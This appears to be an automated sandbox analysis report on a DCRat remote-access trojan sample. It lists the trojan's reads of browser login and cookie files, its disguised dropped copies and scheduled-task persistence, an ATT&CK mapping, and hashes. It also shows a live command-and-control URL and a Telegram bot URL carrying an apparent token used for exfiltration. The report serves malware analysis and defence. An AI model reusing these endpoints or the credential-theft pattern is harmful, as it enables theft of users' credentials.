                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            Source: Yara match File source: 00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe PID: 4708, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe PID: 8536, type: MEMORYSTR
                            Source: Yara match File source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
                            Source: Yara match File source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
                            Source: Yara match File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                            Source: Yara match File source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
                            Source: Yara match File source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
                            Source: Yara match File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                            Remote Access Functionality

                            Source: Yara match File source: 00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe PID: 4708, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe PID: 8536, type: MEMORYSTR
                            Source: Yara match File source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
                            Source: Yara match File source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
                            Source: Yara match File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                            Source: Yara match File source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
                            Source: Yara match File source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
                            Source: Yara match File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                            Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 144 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 341 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 261 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 22 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 261 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                            [Behavior graph (image not reproduced). Behavior Graph ID: 1531798, Sample: d3ca1c9cdcf0f664f4c4b469ce9..., Startdate: 11/10/2024, Architecture: WINDOWS, Score: 100]

                            Source | Detection | Scanner | Label | Link
                            d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe | 100% | Avira | HEUR/AGEN.1323342 |
                            d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe | 100% | Joe Sandbox ML | |

                            Source | Detection | Scanner | Label | Link
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe | 100% | Avira | HEUR/AGEN.1323342 |
                            C:\Recovery\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323342 |
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe | 100% | Avira | HEUR/AGEN.1323342 |
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe | 100% | Avira | HEUR/AGEN.1323342 |
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe | 100% | Joe Sandbox ML | |
                            C:\Recovery\WmiPrvSE.exe | 100% | Joe Sandbox ML | |
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe | 100% | Joe Sandbox ML | |
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe | 100% | Joe Sandbox ML | |
                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            C:\Recovery\WmiPrvSE.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            C:\Users\user\Desktop\ArFrORkS.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                            C:\Users\user\Desktop\DhiqiJKM.log | 6% | ReversingLabs | |
                            C:\Users\user\Desktop\EhviVOkL.log | 46% | ReversingLabs | Win32.Ransomware.Bitpy |
                            C:\Users\user\Desktop\FNQYcsFE.log | 5% | ReversingLabs | |
                            C:\Users\user\Desktop\IUzpLFaA.log | 4% | ReversingLabs | |
                            C:\Users\user\Desktop\KIRpkYvx.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            C:\Users\user\Desktop\PwjnMVKl.log | 4% | ReversingLabs | |
                            C:\Users\user\Desktop\QyIevzpi.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                            C:\Users\user\Desktop\RGFoMnqm.log | 3% | ReversingLabs | |
                            C:\Users\user\Desktop\VWRNVcdg.log | 29% | ReversingLabs | |
                            C:\Users\user\Desktop\VoMNpBPa.log | 6% | ReversingLabs | |
                            C:\Users\user\Desktop\WyUWCOVc.log | 5% | ReversingLabs | |
                            C:\Users\user\Desktop\aceLSxeO.log | 13% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                            C:\Users\user\Desktop\bmmUfKkQ.log | 13% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                            C:\Users\user\Desktop\fTGLCVSM.log | 29% | ReversingLabs | |
                            C:\Users\user\Desktop\fcdLmHlJ.log | 4% | ReversingLabs | |
                            C:\Users\user\Desktop\gUHludjC.log | 17% | ReversingLabs | |
                            C:\Users\user\Desktop\hILtgrfA.log | 29% | ReversingLabs | Win32.Trojan.Generic |
                            C:\Users\user\Desktop\nGlBWAAq.log | 3% | ReversingLabs | |
                            C:\Users\user\Desktop\qDaBeGpk.log | 4% | ReversingLabs | |
                            C:\Users\user\Desktop\rreJQTki.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            C:\Users\user\Desktop\sBnSdgqk.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            C:\Users\user\Desktop\stDzyxQe.log | 8% | ReversingLabs | |
                            C:\Users\user\Desktop\ttRrlCpd.log | 8% | ReversingLabs | |
                            C:\Users\user\Desktop\uDZAyPvf.log | 46% | ReversingLabs | Win32.Ransomware.Bitpy |
                            C:\Users\user\Desktop\wjuqGuQY.log | 29% | ReversingLabs | Win32.Trojan.Generic |
                            C:\Users\user\Desktop\ylgZbdUT.log | 17% | ReversingLabs | |
                            C:\Users\user\Desktop\yuQrGMvY.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            C:\Users\user\Downloads\smartscreen.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            No Antivirus matches
                            No Antivirus matches
                            Source | Detection | Scanner | Label | Link
                            http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
                            http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
                            http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
                            https://g.live.com/odclientsettings/ProdV2.C: | 0% | URL Reputation | safe |
                            https://aka.ms/pscore68 | 0% | URL Reputation | safe |
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                            http://crl.v | 0% | URL Reputation | safe |
                            Name | IP | Active | Malicious | Antivirus Detection | Reputation
                            ipinfo.io | 34.117.59.81 | true | false | | unknown
                            api.telegram.org | 149.154.167.220 | true | true | | unknown
                            Name | Malicious | Antivirus Detection | Reputation
                            https://ipinfo.io/country | false | | unknown
                            http://5.42.66.51/8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php | true | | unknown
                            https://api.telegram.org/bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto | false | | unknown
                            https://ipinfo.io/ip | false | | unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://g.live.com/odclientsettings/Prod/C:svchost.exe, 0000004F.00000003.2444686605.000001C4274F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://api.telegram.orgd3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.telegram.org/botd3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmpfalse
                                              unknown
                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://crl.micpowershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000004F.00000003.2444686605.000001C427480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://crl.micft.cMicRosofpowershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2286246823.0000018037B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E38C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E21E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E11D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.3219775689.000001F6120B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2886040639.0000018180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.3511417406.0000016822BD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.3259951458.0000019354D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.3268697288.000002A1BE461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3495706955.00000164CE721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000042.00000002.3507396549.000001B712461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2882983145.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2899814464.0000023F8001F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
http://crl.v | d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2260842550.000000001D838000.00000004.00000020.00020000.00000000.sdmp | false
                                                    • URL Reputation: safe
                                                    unknown
https://github.com/Pester/Pester | powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmp | false
                                                      unknown
https://ipinfo.io | d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp | false
                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
5.42.66.51 | unknown | Russian Federation | 39493 | RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU | true
34.117.59.81 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
                                                        IP
                                                        127.0.0.1
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1531798
                                                        Start date and time:2024-10-11 20:36:07 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 12m 25s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:81
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Sample name:d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@89/164@2/4
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:Failed
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe, WmiPrvSE.exe
                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, PID 8536 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Time | Type | Description
14:37:07 | API Interceptor | 561x Sleep call for process: powershell.exe modified
14:37:10 | API Interceptor | 23x Sleep call for process: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe modified
14:37:37 | API Interceptor | 9193x Sleep call for process: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe modified
14:37:37 | API Interceptor | 2x Sleep call for process: svchost.exe modified
20:37:07 | Task Scheduler | Run new task: JFQmuJhhcOwSgqtZoqXNEERKgQYwL path: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
20:37:07 | Task Scheduler | Run new task: JFQmuJhhcOwSgqtZoqXNEERKgQYwLJ path: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
20:37:07 | Task Scheduler | Run new task: smartscreen path: "C:\Users\user\Downloads\smartscreen.exe"
20:37:07 | Task Scheduler | Run new task: smartscreens path: "C:\Users\user\Downloads\smartscreen.exe"
20:37:07 | Task Scheduler | Run new task: WmiPrvSE path: "C:\Recovery\WmiPrvSE.exe"
20:37:08 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\Recovery\WmiPrvSE.exe"
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with very long lines (898), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):898
                                                                                                Entropy (8bit):5.895132336130895
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YDkzL/0IPPzksV8uB/uHqG9WzWdnTICnfqq5EwJTECA+9/Xf+ok3q18:YDgBju+W1Tln/Ew1ECA+xXf+Dy8
                                                                                                MD5:1BDDE5E3CFE1A1E8853A4D6BC4B23147
                                                                                                SHA1:482A3C2E0774A5BD1B75F43D43E8F33E303759D1
                                                                                                SHA-256:CA3EDE5B5A950FB371838D9F82EFD7025F979FF65421E9827B3BAE391420C936
                                                                                                SHA-512:7E3680745F9A676F04AB4846E2F593C0A0B95AB83FF2C5FEC2FC7848ACB1D816AE35A075E02AD8C80A9305AB4784BA11BBE310FC15507CB4C37FE4A8964F829D
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2335232
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                MD5:670861D1059F9BAF2A8525097157D1C2
                                                                                                SHA1:F7007917499121CD5107697593A9429911AE0E77
                                                                                                SHA-256:D3CA1C9CDCF0F664F4C4B469CE935FEBB6D974693647CAA476557EEDB53F97C4
